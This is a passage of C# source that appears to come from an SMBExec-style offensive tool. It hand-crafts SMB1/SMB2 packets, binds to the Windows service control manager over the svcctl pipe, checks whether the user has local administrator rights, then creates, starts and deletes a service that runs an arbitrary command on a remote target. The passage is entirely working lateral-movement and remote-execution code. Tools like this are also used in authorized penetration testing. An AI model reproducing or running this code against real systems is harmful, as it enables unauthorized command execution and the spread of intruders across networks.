{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
}
break;
case "CloseRequest":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "TreeDisconnect";
}
break;
case "TreeDisconnect":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBTreeDisconnectRequest();
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "Logoff";
}
break;
case "Logoff":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBLogoffAndXRequest();
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
}
else
{
SMBClientStage = "TreeConnect";
HMACSHA256 HMAC_SHA256 = new HMACSHA256();
while (SMBClientStage != "exit" && SMBExec_Failed == false)
{
if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "TreeConnect":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2TreeConnectRequest(SMB_Path_Bytes);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "CreateRequest";
}
break;
case "CreateRequest":
{
SMB2_Tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2CreateRequestFile(SMB_Named_Pipe_Bytes);
Packet_SMB2_Data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "RPCBind";
}
break;
case "RPCBind":
{
SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
SMB2_Message_ID++;
SMB_File_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "OpenSCManagerW";
}
break;
case "ReadRequest":
{
Thread.Sleep(sleep * 1000);
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
Packet_SMB2_Header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2ReadRequest(SMB_File_ID);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
{
SMBClientStage = SMB_Client_Stage_Next;
}
else
{
SMBClientStage = "StatusPending";
}
}
break;
case "StatusPending":
{
SMBClientStream.Read(SMBClientReceive, 0, SMBClientReceive.Length);
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
{
SMBClientStage = SMB_Client_Stage_Next;
}
}
break;
case "OpenSCManagerW":
{
SMB2_Message_ID = 30;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "CheckAccess";
}
break;
case "CheckAccess":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 127)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
{
SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
if (SMB_execute)
{
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
if (SCM_Data.Length < SMB_Split_Index)
{
SMBClientStage = "CreateServiceW";
}
else
{
SMBClientStage = "CreateServiceW_First";
}
}
else
{
output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
SMB2_Message_ID += 20;
SMB_Close_Service_Handle_Stage = 2;
SMBClientStage = "CloseServiceHandle";
}
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "05-00-00-00")
{
output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
SMBExec_Failed = true;
}
else
{
output.AppendLine(String.Format("Something went wrong with {0}", Target));
SMBExec_Failed = true;
}
}
break;
case "CreateServiceW":
{
if (SMBExec_Command.Length < SMB_Split_Index)
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
}
break;
case "CreateServiceW_First":
{
SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
SMB_Split_Index_Tracker = SMB_Split_Index;
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage_final <= 2)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMB_Split_Stage = 2;
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Middle":
{
SMB_Split_Stage++;
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage >= SMB_Split_Stage_final)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Last":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "StartServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "00-00-00-00")
{
if (debug) { output.AppendLine(String.Format("Service {0} created on {1}", SMB_Service, Target)); }
SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "DeleteServiceW";
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "31-04-00-00")
{
if (debug) { output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target)); }
SMBExec_Failed = true;
}
else
{
if (debug) { output.AppendLine("Service Creation Fault Context Mismatch."); }
SMBExec_Failed = true;
}
}
break;
case "DeleteServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "1d-04-00-00")
{
output.AppendLine(String.Format("Command executed with service {0} on {1}", SMB_Service, Target));
}
